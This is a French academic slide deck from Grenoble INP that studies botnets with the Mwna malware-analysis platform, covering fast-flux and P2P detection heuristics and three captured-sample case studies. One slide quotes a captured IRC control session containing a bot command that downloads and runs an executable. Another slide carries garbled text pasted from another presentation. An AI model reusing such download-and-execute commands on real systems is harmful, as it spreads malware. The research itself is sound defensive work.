Étude des réseaux de logiciels malveillants - ensiwiki · • your botnet is my botnet: analysis...
TRANSCRIPT
![Page 1: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/1.jpg)
Étude des réseaux de logiciels malveillants
Description : Mise en place, utilisation, interprétation des résultats et proposition d’amélioration de la plateforme d’analyse de botnet Mwna Auteur : MOUGEY Camille, Grenoble INP Ensimag En collaboration avec les enseignants-chercheurs Gilles Berger-SABBATEL et Andrez DUDA du laboratoire LIG Grenoble
![Page 2: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/2.jpg)
Plan
2 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Contexte • Problématique • Rappels • Etat de l’art
• Travail effectué
• L’outil Mwna • Heuristique de classification • Cas d’étude
• Conclusion
![Page 3: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/3.jpg)
Plan
3 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Contexte • Problématique • Rappels • Etat de l’art
• Travail effectué
• L’outil Mwna • Heuristique de classification • Cas d’étude
• Conclusion
![Page 4: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/4.jpg)
Introduction de la problématique
4 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Botnet (roBOT NETwork) • GTBot in 1998 • Réseaux de machine compromise • Gérer par un « Botmaster » • Taille (estimée) : > 100 000 (Srizbi, Bobax, Rustock, …)
• Buts multiples • Monétaire • Patriotisme • Hacktivisme • Puissance de calcul • Proxy • …
Global Threat bot source code : http://www.offensivecomputing.net/?q=node/552
![Page 5: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/5.jpg)
Introduction de la problématique
5 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Projet Européen INDECT
• Etapes principales • Infection • Contrôle • Mise à jour
• Notre étude • Détection de comportement Fast-Flux • Détection d’architecture décentralisée • Aspect prise de contrôle • Amélioration de l’outil existant Mwna
Projet INDECT : http://www.indect-project.eu/
![Page 6: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/6.jpg)
Rappels : Architecture Fast-Flux
6 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
![Page 7: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/7.jpg)
Rappels : Architecture Centralisée / Décentralisée
7 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
D◆e�nition Motivations Fonctionnement Evolution Pr◆evention et d◆etection Commerce de botnets D◆emonstration Conclusion Sources Questions
D◆e�nition d'un botnet
Architecture P2P :
Exemples
Botnets P2P (utilisation du r◆eseau Gnutella par exemple)
6/38
D◆e�nition Motivations Fonctionnement Evolution Pr◆evention et d◆etection Commerce de botnets D◆emonstration Conclusion Sources Questions
D◆e�nition d'un botnet
Architecture centralis◆ee :
Exemples
Botnets IRC et HTTP
5/38
• Centralisée • IRC, HTTP, … • Facile à mettre en place • Peu fiable
• Décentralisée • P2P, … • Difficile à mettre en place • Quasiment inattaquable
University of Central Florida : An Advanced Hybrid Peer-to-Peer Botnet
![Page 8: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/8.jpg)
Etat de l’art
8 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Sujet vaste, touchant à tous les secteurs
• Méthode de détection • DNS • Architecture décentralisée • Honeypot
• Prise de contrôle (Takeover)
• Etude plus globale
![Page 9: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/9.jpg)
Plan
9 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Contexte • Problématique • Rappels • Etat de l’art
• Travail effectué
• L’outil Mwna • Heuristique de classification • Cas d’étude
• Conclusion
![Page 10: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/10.jpg)
Présentation de l’outil Mwna
10 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Plateforme avec les outils pour : • Capturer des malwares • Faire tourner les bots dans un environnement totalement
contrôlé • Analyser leurs interactions avec le botmaster • Tester des méthodes et techniques ayant pour but d’atténuer la
nuisance causé par les botnets • Eventuellement en prendre contrôle
• Pour l’étude, deux machines • Sur le réseaux pour la récupération / Mwna • Isolée pour l’analyse des résultats
![Page 11: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/11.jpg)
Mwna Architecture
11 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Capture : Dionaea
• Classification : ClamAV
• SandBox (en ligne) • Anubis • CWSandbox analysis system • Norman SandBox Online Analyzer
Dionaea : http://dionaea.carnivore.it/ ClamAV : http://www.clamav.net/lang/en/ Norman Company: http://www.norman.com/security_center/security_tools/ University of Mannheim: https://mwanalysis.org/ International Secure Systems Lab: http://anubis.iseclab.org/ Fig. 1. Functional architecture of the platform
Linux software to classify the capture malware. This is not very efficient, be-cause almost 1/3 of malware is not even identified by ClamAV, and the samemalware may correspond to different viral Clamav signatures. Even worse, thesame signature may correspond to malware having different network activities.
As a result, we have currently captured about 1600 malware samples classifiedin 450 classes, while 700 samples are not classified at all. Hence, further workshould focus on better classification methods.
After malware classification, we submit at least one sample of each classto three online sandboxed analysis tools: Norman SandBox Online Analyzer 3,CWSandbox analysis system4, and Anubis5. These systems operate by tracingthe execution of the processes in a real or emulated Windows environment,however they can be defeated by malware that contains anti-emulation or anti-tracing code.
3 Norman Company, http://www.norman.com/security_center/security_tools/4 University of Mannheim, https://mwanalysis.org/5 International Secure Systems Lab, http://anubis.iseclab.org/
![Page 12: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/12.jpg)
Heuristiques
12 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Détection automatique de candidat Fast-Flux • Etude des résolutions DNS • Vérification avec les heuristiques Fluxor • Vérification avec les bases de données existantes
• Résultats peu convaincant • Nos heuristiques sont-elles suffisamment fines ? • A-t-on réellement capturé des échantillons Fast-Flux ? • Méthode inductive
Université de Milano : FluXOR: detecting and monitoring fast-flux service networks
![Page 13: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/13.jpg)
Cas d’étude : Botnet centralisé, basé sur un protocole IRC
13 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Résolution DNS « d.homler.net » en 2 IPs • Exemple de session PASS eee KCIK exemple rssr c1 c2 c3 c4 :[email protected] PRIVMSG exemple :VERSION :hub.us.com 001 exemple :us, exemple!c1@*-*-*-* :hub.us.com 005 exemple :exemple!c1@*-*-*-* JOIN :#dpi :hub.us.com 353 exemple @ #dpi :exemple :hub.us.com #dpi !dl http://x.x.x.x/path/i.exe t.exe 1
• Démon IRC modifié • ISON et USERHOST pour lister les pseudos (dans A-Za-z) • Estimé la taille du botnet, impossible réellement (~1013 requêtes)
• Sulley (frelatage) : résultat non concluant • Ingénierie inverse : binaire auto-chiffré
Sulley fuzzer on GitHUB : https ://github.com/OpenRCE/sulley
![Page 14: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/14.jpg)
Cas d’étude n°2 : Ransomware
14 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Après une résolution DNS et une connexion HTTP, plus rien • Inhabituel pour un bot
• Classé comme Ransomware « Kryptik »
• 2 requêtes Web • Retours chiffrés
• N’est pas membre d’un botnet
![Page 15: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/15.jpg)
Cas d’étude n°3 : Architecture inconnue
15 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Connexion directe, sans résolution DNS préalable
• Suspicion d’une architecture décentralisée
• Vérification des IPs contactées • Par résolution DNS inverse • Les deux IPs contactées sont des Kimsufi • Botnet centralisé, peu fiable
• Comportement déterministe
• Heuristique d’architecture décentralisée à revoir
Hébergeur Kimsufi : http ://www.kimsufi.com/fr/
![Page 16: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/16.jpg)
Conclusion
16 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Classification des Fast-Flux • Aucun échantillon, impossible de valider nos hypothèses • Nécessité d’augmenter l’étendue de leur récolte
• Classification des décentralisés • Découverte d’un contre-exemple de l’état de l’art • Nécessité d’affiner les heuristiques
• Capture de malwares autres • La capture ne se fait pas que sur des botnets • Pour affiner les classifications, il faut trouver un moyen de les
écarter
![Page 17: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/17.jpg)
Conclusion - Questions
17 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
?
![Page 18: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/18.jpg)
Références
18 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Protection des attaques DDoS • http://d4n3ws.polux-hosting.com/2012/04/10/comment-se-
defendre-dun-ddos/
• Polytech Grenoble « Botnets, les fantômes de l’internet » • Iheb Khemissi, Joris Brémond Polytech Grenoble
• Communauté active française • Botnets.fr • #botnets.fr sur freenode
• Projet Honeynet • Know your enemy : Tracking botnet
• Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie
![Page 19: Étude des réseaux de logiciels malveillants - Ensiwiki · • Your Botnet is My Botnet: Analysis of a Botnet Takeover • Université de Californie . Références 19 Etude des réseaux](https://reader034.vdocuments.site/reader034/viewer/2022051509/5b1e2b6e7f8b9a8c648b47da/html5/thumbnails/19.jpg)
Références
19 Etude des réseaux de logiciels malveillants - MOUGEY Camille - 22/05/12
• Université de Floride Centrale • An Advanced Hybrid Peer-to-Peer Botnet • Honeypot detection in advanced botnet attacks • Honeypot-Aware Advanced Botnet Construction and
Maintenance
• Laboratoire LIG Grenoble • Étude des réseaux de logiciels malveillants • Analysis of Malware Network Activity